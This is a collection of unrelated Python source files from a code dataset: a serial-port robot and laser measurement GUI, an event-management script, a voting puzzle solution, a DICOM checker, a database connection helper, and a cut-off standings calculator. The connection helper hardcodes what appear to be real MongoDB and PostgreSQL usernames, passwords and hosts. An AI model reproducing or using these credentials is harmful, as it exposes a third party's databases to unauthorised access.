self.OnOK, id = xrc.XRCID(\"wxID_OK\"))\n\n        self.txtRobotTimeout = xrc.XRCCTRL(self,\"txtRobotTimeout\")\n        self.chRobotPort = xrc.XRCCTRL(self,\"chRobotPort\")\n        self.chLaserPort = xrc.XRCCTRL(self,\"chLaserPort\")\n\n    def OnOK(self,evt):\n        self.EndModal(wx.ID_OK)\n\n# Cancel was made impossible on purpose\n#    def OnCancel(self,evt):\n#        self.EndModal(wx.ID_CANCEL)\n\n    def GetPortSettings(self):\n        sts = {}\n\n        sts['RobotTimeout'] = float(self.txtRobotTimeout.GetValue())\n\n        s = self.chRobotPort.GetString(self.chRobotPort.GetCurrentSelection())\n        if s.find('USB') >= 0 :\n            sts['RobotPort'] = \"/dev/ttyUSB0\"\n        else:\n            sts['RobotPort'] = \"/dev/ttyS1\"\n\n\n        s = self.chLaserPort.GetString(self.chLaserPort.GetCurrentSelection())\n        if s.find('USB') >= 0 :\n            sts['LaserPort'] = \"/dev/ttyUSB0\"\n        else:\n            sts['LaserPort'] = \"/dev/ttyS1\"\n\n        if sts['LaserPort'] == sts['RobotPort']:\n            if sts['LaserPort'].find('USB') >= 0 :\n                sts['LaserPort'] = '/dev/ttyS1'\n            else:\n                sts['LaserPort'] = '/dev/ttyUSB0'\n            \n            msg = \"The laser gauge and the robot are assigned the same port.\\n\"\n            msg += \"Giving priority to the robot setting: the robot port was set to \"\n            msg += sts['RobotPort']\n            msg += \" and the laser port to \"\n            msg += sts['LaserPort']\n            msg += \".\"\n\n            dlg = wx.MessageDialog(self, msg, 'Caution', wx.OK|wx.ICON_INFORMATION )\n            dlg.ShowModal()\n            dlg.Destroy()\n\n        return sts\n\n######################################################################\n# MyMeasureDialog\n######################################################################\nclass MyMeasureDialog(wx.Dialog):\n    def __init__(self,parent,target):\n        # target receives MyFrame's grid\n        self.grid = target\n        self.count = 0\n        \n        d = wx.PreDialog()\n        res = xrc.XmlResource(resfile)\n        res.LoadOnDialog(d,parent,\"measureDlg\")\n        self.PostCreate(d)\n\n        self.curPos = xrc.XRCCTRL(self,\"txtCurPos\")\n        self.curAbsPos = xrc.XRCCTRL(self,\"txtCurAbsPos\")\n        self.endPos = 
xrc.XRCCTRL(self,\"txtEndPos\")\n        self.endAbsPos = xrc.XRCCTRL(self,\"txtEndAbsPos\")\n        self.gauge = xrc.XRCCTRL(self,\"gauge\")\n        self.laserVal = xrc.XRCCTRL(self,\"txtLaserValue\")\n        \n        self.Bind(wx.EVT_BUTTON, self.OnCancel,id = xrc.XRCID(\"wxID_CANCEL\"))\n\n        # use timer\n        self.Bind(wx.EVT_TIMER, self.OnTimer)\n        self.timer = wx.Timer(self)\n        ms = float( theControler.getKey('RobotWait') ) * 1000 \n        self.timer.Start( ms ) \n\n        # set up all the controls\n        self.curX = 0.0\n        self.offsetX = float( theControler.getKey('RobotX0') )\n        self.endX = float(theControler.getKey('RobotSpan'))\n        self.deltaX = float(theControler.getKey('RobotKizami'))\n\n        self.curAbsX = self.curX + self.offsetX\n        self.endAbsX = self.offsetX - self.endX # note the direction\n        \n        self.curPos.SetValue( str(self.curX))\n        self.curAbsPos.SetValue( str( self.curAbsX ))\n        self.endPos.SetValue( str(self.endX) )\n        self.endAbsPos.SetValue( str(self.endAbsX))\n\n        self.gauge.SetValue(0) # max is 100 \n\n        # hold robot stop time\n        self.stoptime = float( theControler.getKey('RobotStop') )\n\n        # error handling ?\n        self.grid.ClearGrid()\n        self.grid.SelectBlock(0,0,0,0)\n    \n    def OnCancel(self,evt):\n        self.timer.Stop()\n        self.EndModal(wx.ID_CANCEL)\n\n    def OnTimer(self,evt):\n        # measure first\n        theControler.moveRobot( str(self.curAbsX) )\n        time.sleep(self.stoptime)\n        # read Laser here\n        laserPort.write(\"M1\\r\")\n        v = (laserPort.readline()).rstrip()\n        self.laserVal.SetValue( v )\n        self.grid.SetCellValue(self.count,3, v.replace(\" \",\"\") ) # strip spaces\n\n        self.grid.SetCellValue(self.count,0, str(self.count+1) )\n        self.grid.SetCellValue(self.count,1, str(self.curX) )\n        self.grid.SetCellValue(self.count,2, str(self.curAbsX) )\n        self.grid.SelectRow(self.count)\n        \n        self.grid.MakeCellVisible(self.count,0)\n        \n        # show info\n        self.curPos.SetValue( str(self.curX))\n        self.curAbsPos.SetValue( str(self.curAbsX))\n        self.gauge.SetValue( int( self.curX * 100 / self.endX ) )\n\n        # for next measure\n        self.curX += self.deltaX\n        self.curAbsX = self.offsetX - self.curX # note the direction\n        self.count += 1 \n        if self.curX > self.endX :\n            self.OnCancel(None)\n    \n######################################################################\n# MyFrame\n######################################################################\nclass MyFrame(wx.Frame):\n    def __init__(self):\n        p = wx.PreFrame()\n        res = xrc.XmlResource(resfile)\n        res.LoadOnFrame(p,None,\"topFrame\")\n        self.PostCreate(p)\n\n        self.robotX0 = \"0.0\"\n\n        # menu\n        self.Bind(wx.EVT_MENU, self.OnSaveAs, id = xrc.XRCID(\"wxID_SAVEAS\"))\n        self.Bind(wx.EVT_MENU, self.OnExit, id = xrc.XRCID(\"wxID_EXIT\"))\n        self.Bind(wx.EVT_MENU, self.OnRS232CSetting, id = xrc.XRCID(\"mnRS232CSetting\"))\n        self.Bind(wx.EVT_MENU, self.OnRobotRefPnt, id = xrc.XRCID(\"mnRobotRefPntSet\"))\n        self.Bind(wx.EVT_MENU, self.OnRobotOrg, id = xrc.XRCID(\"mnRobotOrg\"))\n        self.Bind(wx.EVT_MENU, self.OnMeasure, id = xrc.XRCID(\"mnMeasure\"))\n        \n        # set static text\n        #self.stText = xrc.XRCCTRL(self, \"txtMain\")\n        self.stText = wx.TextCtrl(self,style = wx.TE_READONLY|wx.TE_MULTILINE, size=wx.Size(600,150))\n        self.stText.SetValue(msg)\n\n        # grid\n        self.grid = grid.Grid(self)\n        self.grid.CreateGrid(2048,4) # maybe too few?\n        self.grid.SetColLabelValue(0,\"No.\")\n        self.grid.SetColLabelValue(1,\"Position\")\n        self.grid.SetColLabelValue(2,\"Robot coordinate\")\n        self.grid.SetColLabelValue(3,\"Laser value\")\n        \n        # add to sizer\n        self.sizer = wx.BoxSizer(wx.VERTICAL)\n        self.sizer.Add(self.stText,0,wx.EXPAND)\n        self.sizer.Add(self.grid,1,wx.EXPAND)\n        \n        self.SetSizer(self.sizer)\n        self.sizer.Fit(self)\n        \n        
self.grid.SetFocus() # so keyboard events are received right away\n\n        # register this frame with the controller instance\n        theControler.setParent(self)\n\n    ###################################################\n    # functions\n    def OnRS232CSetting(self,evnt = None):\n        \"\"\"Open the RS232C settings dialog\"\"\"\n        dlg = MyRS232CSettingDlg(self)\n        ans = dlg.ShowModal()\n        if ans == wx.ID_OK:\n            # in fact we always end up here\n            self.portSet = dlg.GetPortSettings()\n\n            # open the RS232C ports\n            global robotPort\n            global laserPort\n            if robotPort and robotPort.isOpen():\n                robotPort.close()\n            if laserPort and laserPort.isOpen():\n                laserPort.close()\n\n            # use a slightly longer timeout for the robot\n            robotPort = serial.Serial(self.portSet['RobotPort'],baudrate=9600,parity='O',\n                                      timeout = self.portSet['RobotTimeout'])\n            laserPort = serial.Serial(self.portSet['LaserPort'],baudrate=9600,parity='N',timeout=0.5)\n        \n        dlg.Destroy()\n    \n    def OnExit(self,evnt):\n        md = wx.MessageDialog(self,\"Really quit? Unsaved data will be lost.\",\n                              \"Warning\",wx.YES_NO|wx.NO_DEFAULT|wx.ICON_WARNING )\n        ans = md.ShowModal()\n        md.Destroy()\n        if ans == wx.ID_YES:\n            # the ports have to be closed before close\n            robotPort.close()\n            # laserPort.close()\n            self.Close(True)\n\n    def OnSaveAs(self,evt):\n        \"Save the data to a file. A plain overwrite-save is deliberately not provided.\"\n        # file dialog\n        svDlg = wx.FileDialog(\n            self, message=\"Enter the name of the file to save.\",\n            defaultDir=\"\", \n            defaultFile=\"untitled.txt\",\n            wildcard=\"\",\n            style=wx.SAVE | wx.OVERWRITE_PROMPT | wx.CHANGE_DIR\n            )\n        if svDlg.ShowModal() != wx.ID_OK:\n            return\n        path = svDlg.GetPath()\n        svDlg.Destroy()\n        # show the comment input dialog first...\n        res = xrc.XmlResource(resfile)\n        cDlg = res.LoadDialog(self,\"commentDialog\")\n        if cDlg.ShowModal() != wx.ID_OK:\n            return\n        tt = xrc.XRCCTRL(cDlg,\"txtArea\")\n        comment = \"#\" + tt.GetValue() + \"\\r\\n\"\n        cDlg.Destroy()\n\n        # debug check\n        #print \"path is %s\" % path\n        #print \"comment is %s\" % comment \n\n        # the actual save\n        ff = file(path,\"w\")\n        ff.write( comment.encode('shift_jis') )\n        i = 0\n        while True:\n            l = []\n            if i == 0:\n                for j in range(4):\n                    l.append( self.grid.GetColLabelValue(j)) \n\n            else:\n                for j in range(4):\n                    l.append( self.grid.GetCellValue(i-1,j)) \n\n            if len(l[0]) > 0 :\n                # this way of deciding may be fragile...\n                ss = \"\\t\".join(l)\n                ss += \"\\r\\n\"\n            else:\n                break\n            #print ss\n            ff.write(ss.encode('shift_jis'))\n            i += 1\n        ff.close()\n    \n    def OnRobotOrg(self,evt):\n        # return to origin\n        robotPort.write(\"@ORG\\r\")\n        robotPort.readlines()\n\n    def OnMeasure(self,evt):\n        \"Start a measurement\"\n        md = wx.MessageDialog(self,\"Starting a new measurement. The previous results will be cleared,\\nso unsaved data will be lost.\",\n                              \"Warning\",wx.YES_NO|wx.NO_DEFAULT|wx.ICON_WARNING )\n        ans = md.ShowModal()\n        md.Destroy()\n        if ans == wx.ID_YES:\n            dlg = MyMeasureDialog(self,self.grid)\n            dlg.ShowModal() \n            dlg.Destroy()\n    \n    def OnRobotRefPnt(self,evt = None):\n        \"Set the robot reference position\"\n        dlg = MyRobotRefPntSetDialog(self)\n        ans = dlg.ShowModal()\n        dlg.Destroy()\n    \n######################################################################\n# MyApp\n######################################################################\nclass MyApp(wx.App):\n    def OnInit(self):\n        self.frame = MyFrame()\n        self.frame.Show()\n        self.SetTopWindow(self.frame)\n\n        # show setting for robot and laser\n        self.frame.OnRS232CSetting()\n        for item in sys.argv:\n            if item == \"-I\":\n                \"force the robot back to its origin\"\n                self.frame.OnRobotOrg(None)\n        self.frame.OnRobotRefPnt()\n        \n        return True\n\n# main\nif __name__ == \"__main__\":\n    app = MyApp(False)\n    app.MainLoop()\n\n","sub_path":"shaft_measure.py","file_name":"shaft_measure.py","file_ext":"py","file_size_in_byte":20347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
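The shaft_measure.py record above drives both instruments with the same blocking write-then-read pySerial pattern ("@MOVD"/"@?POS"/"@ORG" for the robot, "M1" for the laser). A minimal sketch of that pattern, kept in the record's Python 2 style; the port names, parities and timeouts below are assumptions, while the command strings come from the record itself:

import serial
import time

# Sketch only: /dev/ttyUSB0, /dev/ttyS1 and the timeouts are assumptions.
robot = serial.Serial("/dev/ttyUSB0", baudrate=9600, parity="O", timeout=2.0)
laser = serial.Serial("/dev/ttyS1", baudrate=9600, parity="N", timeout=0.5)

def move_and_read(x, speed="20", settle=1.0):
    robot.write("@MOVD %s,%s\r" % (x, speed))  # position the single-axis slider
    robot.readlines()                          # drain the OK/NG reply until timeout
    time.sleep(settle)                         # let the workpiece stop vibrating
    laser.write("M1\r")                        # request one measurement
    return laser.readline().rstrip()           # a reading such as "25.4012", or an error code

The blocking readlines() call relies on the port timeout to return, which is presumably why the record exposes the robot timeout as a user setting.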
+{"seq_id":"372433772","text":"'''\nCreated on Oct 25, 2010\n\n@author: suse\n\nScript for managing events\n'''\n\nimport os\nimport sys\nimport shutil\nfrom event.db_connect import db_connect\nfrom event.eid2str import eid2str\n\nclass Man(object):\n '''\n class docs\n '''\n\n def __init__(self):\n '''\n Contructor\n '''\n\n self._db = db_connect()\n\n file_dir = os.path.dirname(__file__)\n self._parent_dir = file_dir + os.sep + '..' + os.sep\n self._subscribers_dir = 'subscribers'\n self._events_dir = 'events'\n\n def process(self, argv):\n if len(argv) > 2:\n func = '_' + '_'.join(argv[1:3])\n self.__getattribute__(func)(argv[3:])\n else:\n print('Wrong number of arguments')\n\n def _add_subscriber(self, argv):\n if self._check_arg(argv, 1):\n subscriber = argv[0]\n res = self._insert_in('subscriber', {'name': subscriber})\n if res:\n path = self._parent_dir + self._subscribers_dir + os.sep + subscriber\n print('make subscr dir {0}'.format(path))\n if not os.path.exists(path):\n os.mkdir(path)\n print(os.listdir(path))\n\n def _del_subscriber(self, name):\n pass\n\n def _add_notifier(self, argv):\n if self._check_arg(argv, 1):\n subscriber = argv[0]\n self._insert_in('notifier', {'name': subscriber})\n\n def _del_notifier(self, name):\n pass\n\n def _add_transport(self, argv):\n if self._check_arg(argv, 2):\n subscriber = argv[0]\n transport = argv[1]\n res = self._insert_in('transport', {'name': transport})\n if res:\n path = self._parent_dir + self._subscribers_dir + os.sep + subscriber + os.sep + transport\n if not os.path.exists(path):\n os.mkdir(path)\n print(os.listdir(path))\n\n def _del_transport(self, subscriber, name):\n pass\n\n def _add_event(self, argv):\n if self._check_arg(argv, 3):\n subscriber = argv[0]\n transport = argv[1]\n event = argv[2]\n res = self._insert_in('event', {'name': event})\n if res:\n row = self._db.get('event', 'CreateFile', 'name')\n id_event = row['id']\n print('event id {0}'.format(id_event))\n s_event = eid2str(id_event) + '.py'\n pacDst = self._parent_dir + self._events_dir + os.sep + transport + os.sep + s_event\n pacSrc = self._parent_dir + self._subscribers_dir + os.sep + subscriber + os.sep + transport + os.sep + s_event\n print('src' + pacSrc)\n print('dst' + pacDst)\n if not os.path.exists(pacDst):\n shutil.copy(pacSrc, pacDst)\n\n\n def _del_event(self, subscriber, transport, name):\n pass\n\n def _add_dispatcher(self, argv):\n if self._check_arg(argv, 4):\n subscriber = argv[0]\n event = argv[1]\n notifier = argv[2]\n transport = argv[3]\n self._insert_in('dispatcher', {'id_subscriber': subscriber,\n 'id_notifier': notifier,\n 'id_transport': transport,\n 'id_event': event})\n\n def _insert_in(self, table, vals):\n try:\n self._db.insert(table, vals)\n print('{0} was added in {1} '.format(vals, table))\n return True\n except:\n print('Error while inserting')\n print(self._db.error)\n return False\n\n def _check_arg(self, argv, num):\n if len(argv) == num:\n return True\n print('Wrong number of arguments')\n return False\n\n#argv = ['', 'add', 'subscriber', 'user10']\n#argv = ['', 'add', 'transport', 'user10', 'mail']\nargv = sys.argv\nm = Man()\nm.process(argv)\n","sub_path":"src/scripts/man.py","file_name":"man.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"324731850","text":"for _ in range(int(input())):\n lst = []\n for _ in range(int(input())):\n lst.append(int(input()))\n ind = lst.index(max(lst))\n if lst.count(max(lst)) > 1:\n 
print('no winner')\n    elif max(lst) > sum(lst) / 2:\n        print(f'majority winner {ind + 1}')\n    else:\n        print(f'minority winner {ind + 1}')\n","sub_path":"Popular Vote.py","file_name":"Popular Vote.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"385262195","text":"import json\nimport os\nimport pydicom\n\nimport matplotlib.pyplot as plt\nfrom pretreatment.dicom_utils import lconvert_from_dicom_to_jpg\n\nf = open('labels.txt', 'r', encoding='utf-8').read()\n\nlabel = json.loads(f)\n\npic = pydicom.read_file('./image1.dcm')\nlconvert_from_dicom_to_jpg('./image1.dcm', './image1.jpg')\nimg = pic.pixel_array # extract the pixel array\nprint(img.shape)\nplt.imshow(img)\nplt.show()\n# print(pic)\npic.get('SOPInstanceUID')\npic.get('SeriesInstanceUID')\n\nseries_uid = label['data'][0]['seriesUid']\ninstance_uid = label['data'][0]['instanceUid']\n\nall_folder = os.listdir('./train')\nfor i in all_folder:\n    files = os.listdir('./train/' + i)\n    for fi in files:\n        pic_info = pydicom.read_file('./train/' + i + '/' + fi)\n        ins = pic_info.get('SOPInstanceUID')\n        series = pic_info.get('SeriesInstanceUID')\n        if ins == instance_uid and series == series_uid:\n            print(i, fi)","sub_path":"pretreatment/picture_check.py","file_name":"picture_check.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"182153512","text":"from __future__ import absolute_import, unicode_literals\n\nimport psycopg2\nimport redis\nimport re\nfrom celery import Celery, Task, platforms\nfrom pymongo import MongoClient, errors\n\nimport conf\n\n\nclass ConnectionTask(Task):\n    abstract = True\n\n    def __init__(self):\n        self._testmdb = None\n        self._dmdb = None\n        self._dmdb_ctrip = None\n        self._smdb = None\n        self._pmdb = None\n        self._static = None\n        self._static_cluster = None\n        self._static_cluster_ctrip = None\n        self._static_ctrip = None\n        self._prrdb={}\n        self._drdb_mast = {}\n        self._drdb_paym = {}\n        self._drdb_new = {}\n        self._srdb_mast = {}\n        self._srdb_new = {}\n        self._dpprdb = {}\n        self._prdb_mast = {}\n        self._prdb_paym = {}\n        self._prdb_activity = {}\n        self._dpgdb = {}\n        self._spgdb = {}\n        self._ppgdb = {}\n    @property\n    def testmdb(self):\n        if self._testmdb is None:\n            _mc = MongoClient(\"mongodb://root:Boluome123@139.198.191.20:17017\")\n            self._testmdb = _mc['boluome']\n        return self._testmdb\n    \n    @property\n    def dmdb(self):\n        if self._dmdb is None:\n            _mc = MongoClient(conf.DEV_MONGO_HOST, replicaset=conf.REPLICASET_NAME)\n            self._dmdb = _mc['boluome']\n        return self._dmdb\n\n    @property\n    def dmdb_ctrip(self):\n        if self._dmdb_ctrip is None:\n            _mc = MongoClient(conf.CTRIP_MONGO_HOST)\n            self._dmdb_ctrip = _mc['ctrip']\n        return self._dmdb_ctrip\n\n    @property\n    def smdb(self):\n        if self._smdb is None:\n            _mc = MongoClient(conf.STG_MONGO_HOST, replicaset=conf.REPLICASET_NAME)\n            self._smdb = _mc['boluome']\n        return self._smdb\n\n    @property\n    def pmdb(self):\n        if self._pmdb is None:\n            _mc = MongoClient(conf.PRO_MONGO_HOST, replicaset=conf.REPLICASET_NAME)\n            self._pmdb = _mc['boluome']\n        return self._pmdb\n\n    @property\n    def static(self):\n        if self._static is None:\n            _mc = MongoClient(conf.STATIC_MONGO_HOST, replicaset=conf.REPLICASET_NAME)\n            self._static = _mc['boluome']\n        return self._static\n\n    @property\n    def static_cluster(self):\n        if self._static_cluster is None:\n            _mc = 
MongoClient('mongodb://root:Boluome123@staticmongo-m.localdomain,staticmongo-s1.localdomain,staticmongo-s2.localdomain/?authSource=admin&readPreference=secondaryPreferred')\n self._static_cluster = _mc['boluome']\n return self._static_cluster\n \n @property\n def static_cluster_ctrip(self):\n if self._static_cluster_ctrip is None:\n _mc = MongoClient('mongodb://root:Boluome123@staticmongo-m.localdomain,staticmongo-s1.localdomain,staticmongo-s2.localdomain/?authSource=admin&readPreference=secondaryPreferred')\n self._static_cluster_ctrip = _mc['ctrip']\n return self._static_cluster_ctrip\n \n @property\n def static_ctrip(self):\n if self._static_ctrip is None:\n _mc = MongoClient(conf.STATIC_MONGO_HOST, replicaset=conf.REPLICASET_NAME)\n self._static_ctrip = _mc['ctrip']\n return self._static_ctrip\n\n def prrdb(self, db):\n if self._prrdb.get(db) is None:\n self._prrdb[db] = redis.StrictRedis(host='rrdb.localdomain',\n port='16379',\n db=db,\n encoding='utf-8',\n decode_responses=True)\n return self._prrdb[db]\n \n def drdb_mast(self, db):\n if self._drdb_mast.get(db) is None:\n self._drdb_mast[db] = redis.StrictRedis(host=conf.DEV_REDIS_MAST_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._drdb_mast.get(db)\n\n def drdb_paym(self, db):\n if self._drdb_paym.get(db) is None:\n self._drdb_paym[db] = redis.StrictRedis(host=conf.DEV_REDIS_PAYM_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._drdb_paym.get(db)\n\n def drdb_new(self, db):\n if self._drdb_new.get(db) is None:\n self._drdb_new[db] = redis.StrictRedis(host=conf.DEV_REDIS_NEW_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._drdb_new.get(db)\n\n def srdb_mast(self, db):\n if self._srdb_mast.get(db) is None:\n self._srdb_mast[db] = redis.StrictRedis(host=conf.STG_REDIS_MAST_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._srdb_mast.get(db)\n\n def srdb_new(self, db):\n if self._srdb_new.get(db) is None:\n self._srdb_new[db] = redis.StrictRedis(host=conf.STG_REDIS_NEW_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._srdb_new.get(db)\n \n def dpprdb(self, db):\n if self._dpprdb.get(db) is None:\n self._dpprdb[db] = redis.StrictRedis(host=\"dppredis.localdomain\",\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._dpprdb.get(db)\n \n def prdb_mast(self, db):\n if self._prdb_mast.get(db) is None:\n self._prdb_mast[db] = redis.StrictRedis(host=conf.PRO_REDIS_MAST_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._prdb_mast.get(db)\n\n def prdb_paym(self, db):\n if self._prdb_paym.get(db) is None:\n self._prdb_paym[db] = redis.StrictRedis(host=conf.PRO_REDIS_PAYM_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._prdb_paym.get(db)\n \n def prdb_activity(self, db):\n if self._prdb_activity.get(db) is None:\n self._prdb_activity[db] = redis.StrictRedis(host=conf.PRO_REDIS_ACTIVITY_HOST,\n port=conf.REDIS_PORT,\n db=db, charset=\"utf-8\",\n decode_responses=True)\n return self._prdb_activity.get(db)\n\n def dpgdb(self, db):\n if self._dpgdb.get(db) is None:\n self._dpgdb[db] = psycopg2.connect(\"host=192.168.0.8 dbname={} user=root password=Boluome123\".format(db))\n # else:\n # self._dpgdb.rollback()\n return self._dpgdb.get(db)\n\n def spgdb(self, db):\n if 
self._spgdb.get(db) is None:\n            self._spgdb[db] = psycopg2.connect(\"host=192.168.2.10 dbname={} user=root password=Boluome123\".format(db))\n        # else:\n        #     self._spgdb.rollback()\n        return self._spgdb.get(db)\n\n    def ppgdb(self, db):\n        if self._ppgdb.get(db) is None:\n            self._ppgdb[db] = psycopg2.connect('host=pg.localdomain dbname={} user=root password=Boluome123'.format(db))\n        # else:\n        #     self._ppgdb.rollback()\n        return self._ppgdb.get(db)\n\n    def __getitem__(self, key):\n        if key in [\"dmdb\", \"dev\"]:\n            return self.dmdb\n        elif key in [\"test\"]:\n            return self.testmdb\n        elif key in [\"dmdb_ctrip\"]:\n            return self.dmdb_ctrip\n        elif key in [\"smdb\", \"stg\"]:\n            return self.smdb\n        elif key in [\"pmdb\", \"pro\"]:\n            return self.pmdb\n        elif key == \"static\":\n            return self.static\n        elif key == \"static_ctrip\":\n            return self.static_ctrip\n        elif key == \"static_cluster\":\n            return self.static_cluster\n        elif key == \"static_cluster_ctrip\":\n            return self.static_cluster_ctrip\n        else:\n            raise KeyError\n\n\ndef mongo_upsert_operation(mdb, database, query, update, upsert=False):\n    \"\"\"\n    Wrapper around mongo's update_one() operation\n    mdb(Object):\n    database(str):\n    query(dict):\n    update(dict):\n    upsert(bool):\n    \"\"\"\n    try:\n        mdb[database].update_one(query, update, upsert=upsert)\n    except errors.DuplicateKeyError as why:\n        mongo_upsert_operation(mdb, database, query, update, upsert)\n        print(\"DuplicateKeyError fetch and retry ok\", query)\n    return\n\n\ndef insert_sql_parse(sql):\n    pattern = re.compile(\"\\(.+?\\)\")\n    r = re.findall(pattern, sql)\n    r[0] = r[0].replace('(', '')\n    r[0] = r[0].replace(')', '')\n    r[0] = r[0].replace(' ', '')\n    keys = r[0].split(',')\n    assert len(keys) == len(r[1].split(','))\n    return keys\n\n\ndef pg_insert(sql, data, conn):\n    \"\"\"\n    Wrapper for the PostgreSQL INSERT INTO statement\n    Args:\n        sql(str):\n        data(list):[{},{}]\n    Returns:\n        out: list of tuples\n    \"\"\"\n    assert isinstance(sql, str)\n    assert isinstance(data, list)\n    assert \";\" in sql\n    sql = sql.replace('?', '%s')\n    keys = insert_sql_parse(sql)\n    conn.commit()\n    conn.rollback()\n    with conn.cursor() as curs:\n        sql_pg = \"\"\n        for item in data:\n            value = [item.get(k) for k in keys]\n            sql_pg += curs.mogrify(sql, value).decode()\n        curs.execute(sql_pg)\n    conn.commit()\n    return\n\n\ndef update_sql_parse(sql):\n    sql_list = sql.split(' ')\n    sql_list = [v for v in sql_list if '%s' in v]\n    sql_clean = ''.join(sql_list)\n    sql_clean = sql_clean.replace(';', '')\n    sql_clean = sql_clean.replace('=%s', ',')\n    keys = [v for v in sql_clean.split(',') if v]\n    assert len(keys) > 1\n    return keys\n\n\ndef pg_update(sql, data, conn):\n    \"\"\"\n    Wrapper for the PostgreSQL UPDATE statement\n    Args:\n        sql(str):\n        data(list):[{},{}]\n    Returns:\n        out: list of tuples\n    \"\"\"\n    assert isinstance(sql, str)\n    assert isinstance(data, list)\n    assert \";\" in sql\n    sql = sql.replace('?', '%s')\n    keys = update_sql_parse(sql)\n    conn.commit()\n    conn.rollback()\n    with conn.cursor() as curs:\n        sql_pg = \"\"\n        for item in data:\n            value = [item.get(k) for k in keys]\n            sql_pg += curs.mogrify(sql, value).decode()\n        curs.execute(sql_pg)\n    conn.commit()\n    return\n\n\ndef pg_select(sql, conn):\n    \"\"\"\n    Wrapper for the PostgreSQL SELECT statement\n    Args:\n        sql(str):\n    Returns:\n        out: list of dict\n\n    datas=pg_select('SELECT key FROM boluome_settlement')\n    \"\"\"\n    assert isinstance(sql, str)\n    assert \";\" in sql\n    conn.commit()\n    conn.rollback()\n    with conn.cursor() as curs:\n        curs.execute(sql)\n        keys = curs.description\n        data_all = curs.fetchall()\n    conn.commit()\n    for item in data_all:\n        yield {v[0]: item[k] for k, v in 
enumerate(keys)}\n\ndef get_in(coll, path=None, default=None):\n \"\"\"Returns a value at path in the given nested collection.\n Args:\n coll(object):\n path(str):'a.0.b.c'\n \"\"\"\n if path is None:\n return coll\n\n for key in path.split('.'):\n try:\n if isinstance(coll, dict):\n coll = coll[key]\n elif isinstance(coll, list):\n coll = coll[int(key)]\n else:\n raise KeyError\n except (KeyError, IndexError, TypeError, ValueError):\n return default\n return coll\n\n\ndef iteritems(coll):\n return coll.items() if hasattr(coll, 'items') else coll\n\n\ndef merge_with(*dicts):\n \"\"\"Merge several dicts.\"\"\"\n dicts = list(dicts)\n if not dicts:\n return {}\n elif len(dicts) == 1:\n return dicts[0]\n\n lists = {}\n for c in dicts:\n for k, v in iteritems(c):\n lists[k] = v\n\n return lists\n","sub_path":"master/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":12760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"545057074","text":"# Input: games pandas\n# Output: standing pandas\ndef make_standing(games):\n import numpy as np\n import pandas as pd\n \n seasons = sorted(list(set(games[\"Season\"])))\n \n # Output is standing pandas\n standing = dict()\n standing[\"Team\"] = []\n standing[\"Season\"] = []\n standing[\"Competition\"] = []\n standing[\"W\"] = []\n standing[\"L\"] = []\n standing[\"T\"] = []\n standing[\"GP\"] = []\n standing[\"GF\"] = []\n standing[\"GA\"] = []\n standing[\"GD\"] = []\n standing[\"R\"] = []\n standing[\"PTS\"] = []\n \n for season in seasons:\n # Games in this season\n games_season = games[games.Season == season]\n \n # Teams\n teams = sorted(list(set(games_season[\"HomeTeam\"])))\n number_of_teams = len(teams)\n \n # Add teams to standing\n for team in teams:\n standing[\"Team\"].append(team)\n standing[\"Season\"].append(season)\n standing[\"Competition\"].append(games_season.Competition.iloc[0])\n standing[\"W\"].append(0)\n standing[\"L\"].append(0)\n standing[\"T\"].append(0)\n standing[\"GP\"].append(0)\n standing[\"GF\"].append(0)\n standing[\"GA\"].append(0)\n standing[\"GD\"].append(0)\n standing[\"R\"].append(0)\n standing[\"PTS\"].append(0) \n \n # Calculate standing\n for i in range(len(games_season)):\n # Check if game already played\n if np.isnan(games_season.iloc[i][\"FTHG\"]):\n continue\n \n ht_game = games_season.iloc[i][\"HomeTeam\"]\n at_game = games_season.iloc[i][\"AwayTeam\"]\n fthg_game = games_season.iloc[i][\"FTHG\"]\n ftag_game = games_season.iloc[i][\"FTAG\"]\n for j in range(len(standing[\"Team\"])):\n # HomeTeam\n if standing[\"Team\"][j] == ht_game and standing[\"Season\"][j] == season:\n # Add GP\n standing[\"GP\"][j] += 1\n \n # Add W-T-L and PTS\n if fthg_game > ftag_game:\n standing[\"W\"][j] += 1\n standing[\"PTS\"][j] += 3\n elif fthg_game == ftag_game:\n standing[\"T\"][j] += 1 \n standing[\"PTS\"][j] += 1\n else:\n standing[\"L\"][j] += 1\n standing[\"PTS\"][j] += 0\n \n # Add Goals\n standing[\"GF\"][j] += fthg_game\n standing[\"GA\"][j] += ftag_game\n standing[\"GD\"][j] += fthg_game-ftag_game\n \n # AwayTeam\n if standing[\"Team\"][j] == at_game and standing[\"Season\"][j] == season:\n # Add GP\n standing[\"GP\"][j] += 1\n \n # Add W-T-L and PTS\n if ftag_game > fthg_game:\n standing[\"W\"][j] += 1\n standing[\"PTS\"][j] += 3\n elif ftag_game == fthg_game:\n standing[\"T\"][j] += 1 \n standing[\"PTS\"][j] += 1\n else:\n standing[\"L\"][j] += 1\n standing[\"PTS\"][j] += 0\n \n # Add Goals\n standing[\"GF\"][j] += ftag_game\n 
